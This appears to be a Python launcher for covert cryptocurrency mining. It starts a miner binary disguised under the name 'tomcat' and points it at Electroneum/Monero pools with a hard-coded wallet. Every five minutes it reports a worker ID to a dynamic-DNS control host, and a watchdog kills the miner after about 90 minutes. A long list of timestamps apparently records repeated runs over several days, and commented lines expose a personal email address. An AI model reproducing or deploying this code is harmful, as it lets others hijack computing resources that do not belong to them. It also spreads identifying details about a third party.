import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:57:07.140142
#2018-02-17 16:44:04.157237
#2018-02-17 18:33:05.147767
#2018-02-17 20:21:04.999441
#2018-02-17 22:08:06.409006
#2018-02-17 23:52:05.847669
#2018-02-18 01:41:07.214493
#2018-02-18 03:28:01.450372
#2018-02-18 05:15:08.947691
#2018-02-18 07:07:06.795821
#2018-02-18 08:55:06.098367
#2018-02-18 10:42:04.952270
#2018-02-18 12:27:07.035935
#2018-02-18 14:15:07.127867
#2018-02-18 16:07:04.096371
#2018-02-18 17:55:07.251995
#2018-02-18 19:41:03.923783
#2018-02-18 21:26:03.415163
#2018-02-18 23:15:06.696923
#2018-02-19 01:03:05.053533
#2018-02-19 02:50:08.229914
#2018-02-19 04:36:08.463954
#2018-02-19 06:21:01.457001
#2018-02-19 08:09:01.680745
#2018-02-19 09:58:07.752577
#2018-02-19 11:49:01.226567
#2018-02-19 13:34:08.469376
#2018-02-19 15:23:07.908075
#2018-02-19 17:11:07.007381
#2018-02-19 18:57:06.920133
#2018-02-19 20:44:01.671958
#2018-02-19 22:31:07.930254
#2018-02-20 00:16:06.107577
#2018-02-20 02:04:01.766862
#2018-02-20 03:53:07.173948
#2018-02-20 05:37:05.219858
#2018-02-20 07:22:05.723402
#2018-02-20 09:07:07.323095
#2018-02-20 10:50:03.233018
#2018-02-20 12:37:04.343105
#2018-02-20 14:22:06.502092
#2018-02-20 16:07:11.092673
#2018-02-20 17:53:07.979865
#2018-02-20 19:43:01.862874
#2018-02-20 21:31:07.963169
#2018-02-20 23:14:08.390126
#2018-02-21 00:59:07.558125
#2018-02-21 02:45:10.729981
#2018-02-21 04:34:01.883399
#2018-02-21 06:22:01.748602
#2018-02-21 08:07:04.063439
#2018-02-21 09:53:07.146091
#2018-02-21 11:42:04.105255
#2018-02-21 13:32:04.066302
#2018-02-21 15:18:04.082334
#2018-02-21 17:08:11.146797
#2018-02-21 18:56:05.741348
#2018-02-21 20:45:03.371959
#2018-02-21 22:29:01.932928
#2018-02-22 00:18:07.726653
#2018-02-22 02:07:04.294629
#2018-02-22 03:52:07.778357
#2018-02-22 05:38:07.682707
#2018-02-22 07:23:06.629549
#2018-02-22 09:11:04.961413
#2018-02-22 11:00:07.160855
#2018-02-22 12:46:01.599005
#2018-02-22 14:31:06.162996
#2018-02-22 16:18:08.015215
#2018-02-22 18:06:12.455707
#2018-02-22 19:56:03.858165
#2018-02-22 21:45:08.935640
#2018-02-22 23:33:05.913220
#2018-02-23 01:20:08.865705
#2018-02-23 03:06:07.212449
#2018-02-23 04:54:01.423342
#2018-02-23 06:40:07.748238
#2018-02-23 08:29:05.836668
#2018-02-23 10:44:08.640072
#2018-02-23 12:41:01.290575
#2018-02-23 14:26:07.484547
#2018-02-23 16:17:05.903260
#2018-02-23 18:04:04.987274
#2018-02-23 19:49:06.472000
#2018-02-23 21:33:06.573731
#2018-02-23 23:23:03.951968
#2018-02-24 01:14:06.693669
#2018-02-24 03:06:07.383128
#2018-02-24 04:52:05.116157
#2018-02-24 06:38:05.390962
#2018-02-24 08:27:04.596975
#2018-02-24 10:13:05.987601
#2018-02-24 12:07:07.422521
#2018-02-24 13:55:05.509252
#2018-02-24 15:48:01.528128
#2018-02-24 17:41:01.565964
#2018-02-24 19:25:07.018917
#2018-02-24 21:15:06.625125
#2018-02-24 23:52:01.464921
#2018-02-25 03:10:04.178263
#2018-02-25 07:07:01.248323